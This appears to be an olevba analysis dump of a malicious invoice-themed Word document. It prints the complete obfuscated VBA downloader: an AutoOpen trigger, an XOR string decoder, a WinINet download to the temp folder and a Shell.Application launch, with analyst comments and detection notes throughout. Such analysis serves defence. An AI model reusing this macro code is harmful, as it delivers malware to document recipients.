dynamoo

Malicious Word macro

May 12th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 123-reg-invoice.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 123-reg-invoice.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Analyst note: one-line trampoline. The Integer argument is never read;
  ' the Sub only forwards control to ALYCE (declared in Module1).
  16. Sub ALVERTA(ALVINA As Integer)
  17. ALYCE
  18. End Sub
  19.  
  ' Analyst note: auto-executable entry point (olevba flags it as AutoExec/AutoOpen:
  ' "Runs when the Word document is opened"). Everything else in the document is
  ' reached from here: autoopen -> ALVERTA -> ALYCE -> AGUSTINA -> AILEEN -> AGUEDA -> AISHA.
  ' The literal 703 is passed to ALVERTA but never used there.
  20. Sub autoopen()
  21. ALVERTA (703)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO MOHAMMAD.bas
  32. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35.  
  36.  
  37.  
  ' Analyst note: non-64-bit branch of the WinINet imports. The random-looking names are
  ' only aliases; the real exports are in the Alias clause:
  '   Ae3eLAYw3N4A -> wininet.dll!InternetCloseHandle
  '   AN3DR1EE2    -> wininet.dll!InternetOpenA
  ' The 64-bit (PtrSafe) declarations of the same aliases sit in other modules
  ' (MARIANO and MONROE), so no single module shows the full import set.
  38. #If VBA7 And Win64 Then
  39. #Else
  40. Public Declare Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As Long) As Long
  41. Public Declare Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As Long
  42. #End If
  ' Analyst note: download-and-write routine.
  '   ALISHA  - never read in the body (the caller passes the literal 52).
  '   ALISHIA - path of the file that receives the downloaded bytes.
  ' Returns True when the length of the collected data is non-zero, otherwise the
  ' default False. Flow: open a WinINet session (ANASTACIA), open the URL (AMELIA),
  ' read the response in ALESSANDRA-sized chunks via the InternetReadFile alias,
  ' write the accumulated string to ALISHIA in binary mode, close both handles.
  ' NOTE(review): host-side this should surface as the Office process loading
  ' wininet.dll and then creating a new file - confirm against your own telemetry.
  43. Public Function ALANNA(ALISHA As Long, ByVal ALISHIA As String) As Boolean
  44.    
  45.     Dim ALYCIA As Long
  ' Fixed-length read buffer (ALESSANDRA = 4000 in module MONROE) plus the accumulator string.
  46.     Dim Allo5LFRoolE64DIA As String * ALESSANDRA, ALd2PH3OdN3SO As String
  47.     Dim ALISSA As Integer, ALISON As Double
  48.    
  49.     #If VBA7 _
  50.     And Win64 Then
  51.         Dim ALYSE As LongPtr
  52.         Dim ALYSHA As LongPtr
  53.     #Else
  54.         Dim ALYSHA As Long
  55.         Dim ALYSE As Long
  56.     #End If
  ' ALYSE = session handle returned by the InternetOpenA alias; bail out if it is 0.
  57.     ALYSE = ANASTACIA
  58.     If ALYSE = 0 Then
  59.         Exit Function
  60.     End If
  61.     Dim ALYSA As Boolean
  62.    
  ' AMELIA stores the InternetOpenUrlA handle into ALYSHA (ByRef); its Boolean result is
  ' ignored (empty If body) and the handle itself is tested instead.
  63.     If AMELIA(ALYSHA, ALYSE) Then
  64.     End If
  65.     If ALYSHA = 0 Then
  66.         ALISON = 0
  67.     Else
  ' First read: ALYCIA receives the byte count. The whole fixed-length buffer is then
  ' copied into the accumulator, irrespective of that count.
  68.         AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
  69.         ALd2PH3OdN3SO = Allo5LFRoolE64DIA
  ' Filler: ALITA becomes 66 and the comparison below can never be true, so End is dead code.
  70.           Dim ALITA As Long
  71.           ALITA = 22
  72.           ALITA = 4 * ALITA - 22
  73. If ALITA > ALITA + 44 Then End
  ' Keep reading until a read reports 0 bytes, appending only the bytes actually read.
  74.         Do While ALYCIA <> 0
  75.             AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
  76.                     ALd2PH3OdN3SO = ALd2PH3OdN3SO + Mid(Allo5LFRoolE64DIA, 1, ALYCIA)
  77.         Loop
  ' ALISON = Len(data) via ALECIA; ALISSA = a free file number via ADELINA (its argument is unused).
  78.              ALISON = ALECIA(ALd2PH3OdN3SO): _
  79.              ALISSA = ADELINA("JOSEF")
  ' Write the collected data to the target path in binary mode.
  80.         Open ALISHIA _
  81.             For Binary _
  82.         Lock Write As #ALISSA
  83.         Put #ALISSA, , ALd2PH3OdN3SO
  ' Filler again: ALITA is positive here, so the End below never runs.
  84.         ALITA = ALITA + 87
  85.     If ALITA < 0 Then End
  86.         Close #ALISSA
  87.     End If
  ' Close the URL handle and the session handle (InternetCloseHandle alias).
  88.     Ae3eLAYw3N4A ALYSHA
  89.     Ae3eLAYw3N4A ALYSE
  90.     ALd2PH3OdN3SO = ""
  91.     If ALISON Then
  92.         ALANNA = True
  93.     End If
  94. End Function
  95.  
  96.  
  ' Analyst note: returns AMBERLY.GetSpecialFolder(2). The only caller (AISHA) passes the
  ' object built by ANABEL.
  ' NOTE(review): if that object is a Scripting.FileSystemObject, special folder 2 is the
  ' temporary folder - confirm the decoded ProgID before relying on this.
  97. Public Function ALENA(ByRef AMBERLY As Object) As Object
  98. Set ALENA = AMBERLY.GetSpecialFolder(2)
  99. End Function
  100.  
  101. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  102. ANALYSIS:
  103. +------------+-------------+-----------------------------------------+
  104. | Type       | Keyword     | Description                             |
  105. +------------+-------------+-----------------------------------------+
  106. | Suspicious | Open        | May open a file                         |
  107. | Suspicious | Lib         | May run code from a DLL                 |
  108. | Suspicious | Binary      | May read or write a binary file (if     |
  109. |            |             | combined with Open)                     |
  110. | Suspicious | Write       | May write to a file (if combined with   |
  111. |            |             | Open)                                   |
  112. | Suspicious | Put         | May write to a file (if combined with   |
  113. |            |             | Open)                                   |
  114. | IOC        | wininet.dll | Executable file name                    |
  115. +------------+-------------+-----------------------------------------+
  116. -------------------------------------------------------------------------------
  117. VBA MACRO MILLARD.bas
  118. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MILLARD'
  119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  120.  
  ' Analyst note: obfuscated string table. Each hex constant is decoded by
  ' ALMEDA(ADALINE, <constant>): every hex byte pair is XORed with one character of the
  ' key ADALINE (see ALMEDA/ADRIAN for the key indexing).
  '   AARON    - passed to CreateObject in ALBERT; hand-decoding gives the ProgID
  '              "Shell.Application" (re-verify before relying on it).
  '   ABBEY    - decoded in AISHA and appended to the GetSpecialFolder(2) path, so it is
  '              presumably the dropped file's name.
  '   ABBIE    - decoded in AMELIA and passed as the URL argument of InternetOpenUrlA,
  '              i.e. the download location (decode in an isolated analysis environment).
  '   ABIALITA - passed to CreateObject in ANABEL; hand-decoding gives the ProgID
  '              "Scripting.FileSystemObject" (re-verify before relying on it).
  '   ADALINE  - the XOR key.
  121. Public Const AARON = "193B33233B78033F272E2634283C2B2721"
  122. Public Const ABBEY = "163A3E22363F2E7B79736167672D3A2D"
  123. Public Const ABBIE = "2227223F6D796D2938313B323B212C2F222C5A5D46222F20782C383B6D7B647060607E6627302A"
  124. Public Const ABIALITA = "1930242627222B21306C093E252D11313C3D525F7B292036353B"
  125. Public Const ADALINE = "KJSVOWVBOWBOWIHBHOI724"
  ' 64-bit (PtrSafe) declaration of the InternetReadFile alias; the non-64-bit one is in Module1.
  126. #If VBA7 And Win64 Then
  127. Public Declare PtrSafe Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As LongPtr, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
  128. #End If
  ' Analyst note: thin wrapper whose only effective work is building the object from
  ' ANABEL and calling AISHA. The For loops and arithmetic on AIDA/AMANDA are filler
  ' that does not influence the call. No return value is assigned.
  129. Public Function AGUEDA(AMANDA As Double)
  130.  
  131.  
  132.  
  133.  
  ' Local object named AFTON (same name as the Public Function AFTON in module MONROE).
  ' It is never assigned here; AISHA overwrites it through its ByRef parameter.
  134. Dim AFTON As Object
  135.  
  136.  
  137.     Dim AIDA As Long
  138. For AIDA = 43 To 47
  139. AIDA = AIDA + 22
  140. Next AIDA
  141.    
  142.  
  143. Dim WESTON  As Object
  144.  
  145.  
  146. For AIDA = 21 To 76
  147. AIDA = AIDA + 73
  148. Next AIDA
  149.    
  150.  
  ' WESTON = CreateObject(<decoded ABIALITA>) via ANABEL.
  151. Set WESTON = ANABEL
  152. AIDA = AIDA + 345
  153. Dim LEWIS As Boolean
  154.  
  ' Never true for the positive AIDA reached here, so End is dead code.
  155. If AIDA > AIDA * 4 Then End
  ' Hands over to AISHA, which performs the download and the launch.
  156. LEWIS = AISHA(AFTON, WESTON)
  157. AMANDA = AMANDA + 33
  158. End Function
  159.  
  160.  
  ' Analyst note: renamed wrapper around Len(); returns the length of ADELLA.
  ' Used by the string decoder (ALMEDA/ADRIAN) and by ALANNA to size the downloaded data.
  161. Public Function ALECIA(ADELLA As String) As Long
  162. ALECIA = Len(ADELLA)
  163. End Function
  164.  
  165.  
  166.  
  ' Analyst note: launch step. Creates the COM object whose ProgID is the decoded AARON
  ' constant and calls its Open method on AKIKO & ALPHONSE - the same concatenation that
  ' AISHA uses as the download target path.
  ' NOTE(review): hand-decoding AARON gives "Shell.Application"; re-verify. A process
  ' started from the special folder with an Office parent is the behaviour to look for.
  ' ALLEGRA is unused and the function never assigns its return value (stays False).
  ' ALLENA is not declared in this function.
  167. Public Function ALBERT(ByRef AKIKO As Object, ByRef ALPHONSE As String, ALLEGRA As Double) As Boolean
  168.  
  169. Set ALLENA = CreateObject(ALMEDA _
  170. (ADALINE, AARON))
  171. Dim DUSTY As Integer
  172. DUSTY = ALLENA.Open(AKIKO & ALPHONSE)
  173. End Function
  174.  
  175.  
  176.  
  ' Analyst note: string decoder (hex + repeating-key XOR).
  '   ALMETA - key string (callers pass ADALINE).
  '   ALONA  - hex-encoded ciphertext (two hex digits per output character).
  ' For i = 1 .. Len(ALONA)/2:
  '   ALEIDA(ALONA, i)  -> numeric value of the i-th hex pair
  '   ADRIAN(ALMETA, i) -> Asc of key character at position (i Mod Len(key)) + 1,
  '                        so the key is consumed starting from its SECOND character
  '   ALBERTHA(a, b)    -> Chr$(a Xor b)
  ' Returns the concatenated plaintext.
  177. Public Function ALMEDA(ALMETA As String, ALONA As String) As String
  178.    
  179.     Dim ALPHA As Integer
  180.     Dim ALTAGRACIA As Integer
  181.    
  182.    
  ' Filler: the comparison below is never true for 308, so End is dead code.
  183.     Dim ALTHEA As Long
  184.  ALTHEA = 308
  185. If ALTHEA > ALTHEA * 10 Then End
  186.    
  187.     Dim ALEJANDRA As Long
  188.     Dim ALVERA As String
  189.     For ALEJANDRA = 1 To (ALECIA(ALONA) / 2)
  190.         ALPHA = ALEIDA(ALONA, ALEJANDRA)
  191.         ALTAGRACIA = ADRIAN(ALMETA, ALEJANDRA)
  192.         ALVERA = ALVERA + ALBERTHA(ALPHA, ALTAGRACIA)
  193.     Next ALEJANDRA
  194.    ALMEDA = ALVERA
  195. End Function
  196.  
  ' Analyst note: key-byte selector for the decoder. Returns the character code of the key
  ' character at 1-based position (ALEJANDRA Mod Len(ALMETA)) + 1. ALEXA is a Mid$ wrapper;
  ' its first argument (48) has no effect on the result.
  197. Public Function ADRIAN(ByRef ALMETA As String, ByRef ALEJANDRA As Long) As Integer
  198. ADRIAN = Asc(ALEXA(48, ALMETA, ((ALEJANDRA Mod ALECIA(ALMETA)) + 1), 1))
  199. End Function
  200.  
  201.  
  202.  
  203. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  204. ANALYSIS:
  205. +------------+----------------+-----------------------------------------+
  206. | Type       | Keyword        | Description                             |
  207. +------------+----------------+-----------------------------------------+
  208. | Suspicious | Open           | May open a file                         |
  209. | Suspicious | CreateObject   | May create an OLE object                |
  210. | Suspicious | Lib            | May run code from a DLL                 |
  211. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  212. |            |                | be used to obfuscate strings (option    |
  213. |            |                | --decode to see all)                    |
  214. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  215. |            |                | may be used to obfuscate strings        |
  216. |            |                | (option --decode to see all)            |
  217. | IOC        | wininet.dll    | Executable file name                    |
  218. +------------+----------------+-----------------------------------------+
  219. -------------------------------------------------------------------------------
  220. VBA MACRO MARIANO.bas
  221. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARIANO'
  222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  223.  
  ' Analyst note: 64-bit (PtrSafe) declaration of the InternetCloseHandle alias.
  ' The non-64-bit declaration of the same alias is in module MOHAMMAD.
  224. #If VBA7 And Win64 Then
  225. Public Declare PtrSafe Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As LongPtr) As Long
  226. #End If
  227.  
  228.  
  ' Analyst note: call-chain link. The only effective statement is the call to AGUEDA;
  ' the parameter is unused and the AILENE string assignments are filler whose result is
  ' discarded. No return value is assigned.
  229. Public Function AILEEN(ANAMARIA As String)
  230. Dim AILENE As String
  231. AILENE = "ANAMARIA"
  232. AGUEDA 221 + 3.22
  233. AILENE = AILENE + "AIMEE"
  234. End Function
  235.  
  236.  
  237.  
  238.  
  ' Analyst note: hex-pair parser for the decoder. Takes the two characters of ALONA that
  ' start at position 2*ALEJANDRA - 1 (ALYSSA), prefixes "&H" and converts the result to a
  ' number through ANIBAL (a Val wrapper). The first ALEXA argument (78) has no effect.
  239. Public Function ALEIDA(ByRef ALONA As String, ByRef ALEJANDRA As Long) As Double
  240.  ALEIDA = ANIBAL("&H" & (ALEXA(78, ALONA, ALYSSA(ALEJANDRA), 2)))
  241. End Function
  242.  
  ' Analyst note: renamed wrapper around Mid$(ADELLA, ALPHA, ALTAGRACIA).
  ' The first parameter is only incremented after the result is set and never feeds into
  ' it; callers pass throwaway literals (48, 78).
  243. Public Function ALEXA(ALEXANDRA As Long, ByRef ADELLA As String, ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
  244.     ALEXA = Mid$(ADELLA, ALPHA, ALTAGRACIA)
  245.     ALEXANDRA = ALEXANDRA + 23
  246. End Function
  247.  
  248.  
  249.  
  250.  
  ' Analyst note: maps the 1-based index of a hex pair to the 1-based character offset of
  ' its first digit (1 -> 1, 2 -> 3, 3 -> 5, ...).
  251. Public Function ALYSSA(ByRef ALEJANDRA As Long) As Long
  252.  ALYSSA = (2 * ALEJANDRA) - 1
  253. End Function
  254.  
  255.  
  ' Analyst note: call-chain link between ALYCE and AILEEN. The Double argument is unused
  ' and the string passed on is a throwaway literal.
  256. Sub AGUSTINA(ANALISA As Double)
  257.  
  258. AILEEN ("ANALISA")
  259. End Sub
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type       | Keyword        | Description                             |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Lib            | May run code from a DLL                 |
  266. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  267. |            |                | may be used to obfuscate strings        |
  268. |            |                | (option --decode to see all)            |
  269. | IOC        | wininet.dll    | Executable file name                    |
  270. +------------+----------------+-----------------------------------------+
  271. -------------------------------------------------------------------------------
  272. VBA MACRO MARY.bas
  273. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARY'
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275.  
  276.  
  277.  
  ' Analyst note: renamed wrapper around Val(). The For loop is filler: DILLON is
  ' overwritten with Val(FRANCES) immediately afterwards. ALEIDA calls this with an
  ' "&H"-prefixed string to turn a hex pair into a number.
  278. Public Function ANIBAL(FRANCES As String) As Double
  279. Dim DILLON As Double
  280. For DILLON = 26 To 29
  281. DILLON = DILLON * 6.127
  282. Next DILLON
  283. DILLON = Val(FRANCES)
  284. ANIBAL = DILLON
  285. End Function
  286.  
  ' Analyst note: orchestrator of the payload stage.
  '   1. AKIKO    = GetSpecialFolder(2) of the object created by ANABEL (via ALENA).
  '   2. ALPHONSE = decoded ABBEY constant (AFTON -> ALMEDA).
  '   3. ADOLFO   = AKIKO & ALPHONSE, used as the download target path.
  '   4. ALANNA downloads to ADOLFO; its result is ignored (empty If body), so
  '   5. ALBERT is called to open AKIKO & ALPHONSE whether or not the download succeeded.
  ' AKILAH is never used in the body; the incoming AKIKO value is overwritten.
  ' NOTE(review): AKIKO & ALPHONSE presumably relies on the folder object's default
  ' property yielding its path - confirm.
  287. Public Function AISHA(ByRef AKIKO As Object, ByRef AKILAH As Object) As Boolean
  288.  
  289. Dim AL2AIN2A As Integer
  290. Set AKIKO = ALENA(ANABEL)
  291.  
  292. Dim ADOLFO
  293.  
  294. Dim ALPHONSE As String
  ' 3001 is a throwaway first argument; AFTON only forwards the key and the constant to ALMEDA.
  295. ALPHONSE = AFTON(3001, ADALINE, ABBEY)
  296.  
  ' Filler loop; AL2AIN2A is not used afterwards.
  297. For AL2AIN2A = 21 To 34
  298. AL2AIN2A = AL2AIN2A * 12
  299. Next AL2AIN2A
  300. ADOLFO = AKIKO & ALPHONSE
  301.  
  302. If ALANNA(52, ADOLFO) Then
  303. End If
  304.  
  305.  
  306. AISHA = ALBERT(AKIKO, ALPHONSE, 966)
  307.  
  308. End Function
  309.  
  ' Analyst note: innermost decoder step - returns the single character Chr$(ALPHA Xor
  ' ALTAGRACIA). This is the Chr/Xor pair olevba flags as suspicious for this module.
  310. Public Function ALBERTHA(ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
  311.     Dim ALISA As Long
  312.     ALISA = ALPHA Xor ALTAGRACIA
  313.     ALBERTHA = Chr$(ALISA)
  314. End Function
  315.  
  316.  
  317.  
  ' Analyst note: opens the WinINet session. AN3DR1EE2 is the InternetOpenA alias; the
  ' arguments are ANDERA ("ALETHEA", the agent string), ANDRE (1, the access type),
  ' two null strings and flags 0. Only the return type differs between the two
  ' conditional signatures (LongPtr vs Long).
  ' NOTE(review): the fixed agent string "ALETHEA" should appear as the HTTP User-Agent of
  ' the download request and is a candidate network indicator - confirm in a capture.
  318. #If VBA7 _
  319.     And Win64 Then
  320. Public Function ANASTACIA() As LongPtr
  321.  #Else
  322. Public Function ANASTACIA() As Long
  323.  
  324.  #End If
  325.  
  326.  ANASTACIA = AN3DR1EE2 _
  327.  (ANDERA, _
  328.  ANDRE, vbNullString, vbNullString, 0)
  329. End Function
  330.  
  ' Analyst note: decodes ABIALITA with the key ADALINE and returns
  ' CreateObject(<decoded ProgID>). The ProgID never appears in clear text in the document.
  ' NOTE(review): hand-decoding gives "Scripting.FileSystemObject", which matches the
  ' GetSpecialFolder call in ALENA - re-verify before relying on it.
  331. Public Function ANABEL() As Object
  332. Dim AMPARO As String
  333. AMPARO = ALMEDA(ADALINE, ABIALITA)
  334. Set ANABEL = CreateObject(AMPARO)
  335. End Function
  336.  
  337.  
  338.  
  339.  
  340.  
  341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  342. ANALYSIS:
  343. +------------+--------------+-----------------------------------------+
  344. | Type       | Keyword      | Description                             |
  345. +------------+--------------+-----------------------------------------+
  346. | Suspicious | Chr          | May attempt to obfuscate specific       |
  347. |            |              | strings                                 |
  348. | Suspicious | Xor          | May attempt to obfuscate specific       |
  349. |            |              | strings                                 |
  350. | Suspicious | CreateObject | May create an OLE object                |
  351. +------------+--------------+-----------------------------------------+
  352. -------------------------------------------------------------------------------
  353. VBA MACRO MONROE.bas
  354. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MONROE'
  355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  356.  
  357.  
  ' Analyst note: 64-bit (PtrSafe) declaration of the InternetOpenA alias.
  ' The non-64-bit declaration of the same alias is in module MOHAMMAD.
  358. #If VBA7 And Win64 Then
  359. Public Declare PtrSafe Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As LongPtr
  360. #End If
  361.  
  362.  
  ' Analyst note: constants consumed by the WinINet calls.
  '   JASPER     - not referenced anywhere in the extracted macros.
  '   ALESSANDRA - 4000: size of the fixed-length read buffer in ALANNA.
  '   ANDERA     - "ALETHEA": agent string passed to InternetOpenA in ANASTACIA.
  '   ANDRE      - 1: access-type argument of InternetOpenA
  '                (NOTE(review): 1 is INTERNET_OPEN_TYPE_DIRECT in WinINet - confirm).
  '   ALETHIA    - &H4000000: flags argument of InternetOpenUrlA in AMELIA
  '                (NOTE(review): matches INTERNET_FLAG_DONT_CACHE - confirm).
  363. Public Const JASPER = "RUSSEL"
  364.  
  365.  
  366. Public Const ALESSANDRA = 4000
  367. Public Const ANDERA As String = "ALETHEA"
  368. Public Const ANDRE = 1
  369. Public Const ALETHIA = &H4000000
  370.  
  371.  
  372.  
  373.  
  374.  
  ' Analyst note: opens the download URL.
  '   AMIEE - ByRef out-parameter that receives the InternetOpenUrlA handle.
  '   AMINA - session handle from InternetOpenA.
  ' Always returns True; the caller (ALANNA) tests the handle in AMIEE instead.
  ' The two conditional signatures differ only in handle width (LongPtr vs Long).
  375. #If VBA7 And Win64 Then
  376.        Public Function AMELIA(ByRef AMIEE As LongPtr, AMINA As LongPtr) As Boolean
  377.     #Else
  378.        Public Function AMELIA(ByRef AMIEE As Long, AMINA As Long) As Boolean
  379.     #End If
  380.         Dim AM425Ewr24tRI52CA As Long
  381. Dim AMIRA As String
  382. Dim AMMIE As Long
  ' AMIRA = decoded ABBIE constant, i.e. the URL; 301 is a throwaway argument.
  383.     AMIRA = AFTON(301, ADALINE, ABBIE)
  384.  
  ' Filler: counts from 55 To 33 with the default step, so the body never executes.
  385. For AM425Ewr24tRI52CA = 55 To 33
  386. AM425Ewr24tRI52CA = AM425Ewr24tRI52CA + 900
  387. Next AM425Ewr24tRI52CA
  ' InternetOpenUrlA(session, url, no extra headers, 0, flags = ALETHIA, context 0).
  388.     AMIEE = AL3ES1HI5A(AMINA, AMIRA, vbNullString, 0, ALETHIA, 0)
  389.     AMELIA = True
  390. End Function
  391.  
  392.  
  ' Analyst note: indirection in front of the decoder. Returns ALMEDA(HILARIO, ENRIQUE)
  ' (key, hex ciphertext). AGATHA is multiplied and then discarded; callers pass
  ' throwaway literals (301, 3001).
  393. Public Function AFTON(AGATHA As Long, HILARIO As String, ENRIQUE As String) As String
  394. AGATHA = AGATHA * 3
  395. AFTON = ALMEDA(HILARIO, ENRIQUE)
  396.    
  397. End Function
  398.  
  ' Analyst note: renamed wrapper around FreeFile; the string argument is ignored.
  ' ALANNA uses the returned file number for its Open ... For Binary / Put / Close sequence.
  399. Public Function ADELINA(ADELLA As String) As Integer
  400.     ADELINA = FreeFile
  401. End Function
  402.  
  403.  
  404. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  405. ANALYSIS:
  406. +------------+-------------+-------------------------+
  407. | Type       | Keyword     | Description             |
  408. +------------+-------------+-------------------------+
  409. | Suspicious | Lib         | May run code from a DLL |
  410. | IOC        | wininet.dll | Executable file name    |
  411. +------------+-------------+-------------------------+
  412. -------------------------------------------------------------------------------
  413. VBA MACRO Module1.bas
  414. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/Module1'
  415. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Analyst note: remaining WinINet imports.
  '   AL3ES1HI5A -> wininet.dll!InternetOpenUrlA (64-bit PtrSafe and non-64-bit variants)
  '   AL3ES2H1A2 -> wininet.dll!InternetReadFile (non-64-bit; the PtrSafe one is in MILLARD)
  ' Together with InternetOpenA and InternetCloseHandle from the other modules these are
  ' the four WinINet exports the macros declare. The randomised alias names mean
  ' keyword matching has to look at the Alias strings, not the VBA identifiers.
  416. #If VBA7 And Win64 Then
  417. Public Declare PtrSafe Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As LongPtr, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As LongPtr
  418. #End If
  419.  
  420.  
  421.  
  422. #If VBA7 And Win64 Then
  423. #Else
  424. Public Declare Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As Long, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
  425. Public Declare Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As Long, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As Long
  426. #End If
  ' Analyst note: call-chain link reached from ALVERTA. DEWITT is unused and the For loop
  ' on AGRIPINA is filler; the only effective statement is the call to AGUSTINA, whose
  ' argument (6.33) is itself unused downstream.
  427. Public Sub ALYCE()
  428.         Dim DEWITT As Double
  429.  
  430.     Dim AGRIPINA As Double
  431. For AGRIPINA = 21 To 25
  432. AGRIPINA = AGRIPINA + 22
  433. Next AGRIPINA
  434.  
  435. AGUSTINA (6.33)
  436.  
  437. End Sub
  438.  
  439. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  440. ANALYSIS:
  441. +------------+----------------+-----------------------------------------+
  442. | Type       | Keyword        | Description                             |
  443. +------------+----------------+-----------------------------------------+
  444. | Suspicious | Lib            | May run code from a DLL                 |
  445. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  446. |            |                | be used to obfuscate strings (option    |
  447. |            |                | --decode to see all)                    |
  448. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  449. |            |                | may be used to obfuscate strings        |
  450. |            |                | (option --decode to see all)            |
  451. | IOC        | wininet.dll    | Executable file name                    |
  452. +------------+----------------+-----------------------------------------+